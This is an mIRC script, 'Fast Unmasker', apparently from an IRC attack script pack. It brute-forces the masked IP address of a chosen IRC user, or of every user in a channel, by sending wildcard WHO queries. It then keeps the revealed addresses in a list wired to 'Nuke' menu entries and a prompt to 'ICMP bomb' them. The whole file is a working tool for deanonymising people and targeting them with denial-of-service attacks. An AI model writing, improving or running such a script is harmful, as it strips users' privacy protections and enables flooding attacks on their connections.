[script]
n0=;Fast Unmasker v1.0 by phys1ks
n1=;Modified for use in HackFactor Relentless by Paragon
n2=
n3=#unmasker off
n4=raw 352:*: { 
n5=  if ( %unmask.nick == $6 ) { .enable #unmaskit }
n6=}
n7=#unmasker end
n8=#unmaskit off
n9=raw 315:*: { .disable #unmaskit | //fastunmask $2 }
n10=#unmaskit end
n11=menu @UnMask { 
n12=  %unmask.nick:/halt
n13=  -
n14=  Nuke %unmasked:/nuke %unmasked
n15=  Copy IP To Clipboard:/clipboard %unmasked
n16=  -
n17=  Last Unmasks
n18=  . %name1 - %nuke1:nuke %nuke1
n19=  . %name2 - %nuke2:nuke %nuke2
n20=  . %name3 - %nuke3:nuke %nuke3
n21=  . %name4 - %nuke4:nuke %nuke4
n22=  . %name5 - %nuke5:nuke %nuke5
n23=  . %name6 - %nuke6:nuke %nuke6
n24=  . %name7 - %nuke7:nuke %nuke7
n25=  . %name8 - %nuke8:nuke %nuke8
n26=  . %name9 - %nuke9:nuke %nuke9
n27=  . %name10 - %nuke10:nuke %nuke10
n28=  . %name11 - %nuke11:nuke %nuke11
n29=  .-
n30=  .Clear List:unset %nuke* | unset %name* | echoa Last Unmasks list cleared.  
n31=
n32=  Close:window -c @UnMask
n33=}
n34=
n35=
n36=alias fastunmask {
n37=  if ($1 == $null) { echoa ERROR! No IP to unmask! | .disable #unmasker | halt }
n38=  if (($right($1,1) != ?) && ($right($1,1) != x)) { set %unmasked $replace($1,?,.) | .lastnuke %unmasked | .lastname %unmask.nick | echo @UnMask %unmask.ip unmasked to $replace($1,?,.) $+ .  UnMasked in $duration($calc($ctime - %unmask.time)) | //echo @UnMask Press F8 to ICMP bomb %unmasked $+ . | .disable #unmasker | halt }
n39=  unset %base.ip
n40=  unset %x
n41=  unset %do.ip
n42=  unset %remove.base
n43=  if (xxx isin $1) { set %x ?? | goto unmask }
n44=  if (xx isin $1) { set %x ? | goto unmask }
n45=  if (x isin $1) { unset %x | goto unmask }
n46=  if ($right($1,2) == ??) { set %x ? |  goto unmask }
n47=  if ($right($1,1) == ?) { unset %x | goto unmask }
n48=  :unmask
n49=  set %base.ip $remove($1,xxx)
n50=  set %base.ip $remove($1,xx)
n51=  set %base.ip $remove($1,x)
n52=  set %base.ip $replace(%base.ip,.,?)
n53=  if ($right($1,2) == ??) { set %remove.base $calc($len($1) - 2) | set %base.ip $left($1,%remove.base) | goto doo }
n54=  if ($right($1,1) == ?) { set %remove.base $calc($len($1) - 1) | set %base.ip $left($1,%remove.base) | goto doo }
n55=  :doo  
n56=  set %i 0
n57=  :loop
n58=  if (%i <= 9) { 
n59=    if (%do.ip == $null) { set %do.ip %base.ip $+ %i $+ %x }
n60=    set %do.ip %do.ip $+ , $+ %base.ip $+ %i $+ %x
n61=    inc %i 1
n62=    goto loop
n63=  }
n64=  //raw -q who %do.ip
n65=}
n66=alias massunmask {
n67=  window -e @UnMask
n68=  set %mass 0
n69=  set %mass2 0
n70=  :incl
n71=  if %mass < $nick(0,$1) {
n72=    inc %mass 1
n73=    if $nick(%mass,$1) != $me {
n74=      if (%mass == 1) { unmaskdo $nick(%mass,$1) | goto incl }
n75=      set %mass2 $calc(%mass2 + 7)
n76=      timer $+ $nick(%mass,$1) 1  %mass2 //unmaskdo $nick(%mass,$1)
n77=    }
n78=    goto incl
n79=  }
n80=  echo @UnMask Finished setting up unmask.
n81=}
n82=
n83=alias unmaskdo {
n84=  if ($1 == $null) { halt }
n85=  set %unmask.time $ctime
n86=  window -e @UnMask
n87=  echo @UnMask Attempting to unmask $1 $+ .
n88=  set %unmask.ip $remove($address($1,2),*!*@)
n89=  set %unmask.nick $1
n90=  .enable #unmasker
n91=  fastunmask %unmask.ip
n92=}
n93=
n94=alias lastnuke { 
n95=  if ($1 == %nuke1) { halt }
n96=  if ($1 == %nuke2) { halt }
n97=  if ($1 == %nuke3) { halt }
n98=  if ($1 == %nuke4) { halt }
n99=  if ($1 == %nuke5) { halt }
n100=  if ($1 == %nuke6) { halt }
n101=  if ($1 == %nuke7) { halt }
n102=  if ($1 == %nuke8) { halt }
n103=  if ($1 == %nuke9) { halt }
n104=  if ($1 == %nuke10) { halt }
n105=  if ($1 == %nuke11) { halt }
n106=  set %nuke1 %nuke2 
n107=  set %nuke2 %nuke3 
n108=  set %nuke3 %nuke4 
n109=  set %nuke4 %nuke5 
n110=  set %nuke5 %nuke6 
n111=  set %nuke6 %nuke7 
n112=  set %nuke7 %nuke8 
n113=  set %nuke8 %nuke9 
n114=  set %nuke9 %nuke10 
n115=  set %nuke10 %nuke11 
n116=  set %nuke11 $1-
n117=}
n118=
n119=alias lastname { 
n120=  if ($1 == %name1) { halt }
n121=  if ($1 == %name2) { halt }
n122=  if ($1 == %name3) { halt }
n123=  if ($1 == %name4) { halt }
n124=  if ($1 == %name5) { halt }
n125=  if ($1 == %name6) { halt }
n126=  if ($1 == %name7) { halt }
n127=  if ($1 == %name8) { halt }
n128=  if ($1 == %name9) { halt }
n129=  if ($1 == %name10) { halt }
n130=  if ($1 == %name11) { halt }
n131=  set %name1 %name2 
n132=  set %name2 %name3 
n133=  set %name3 %name4 
n134=  set %name4 %name5 
n135=  set %name5 %name6 
n136=  set %name6 %name7 
n137=  set %name7 %name8 
n138=  set %name8 %name9 
n139=  set %name9 %name10 
n140=  set %name10 %name11 
n141=  set %name11 $1-
n142=}
n143=menu nicklist { 
n144=-
n145=Unmask:/unmaskdo $$1
n146=-
n147=}
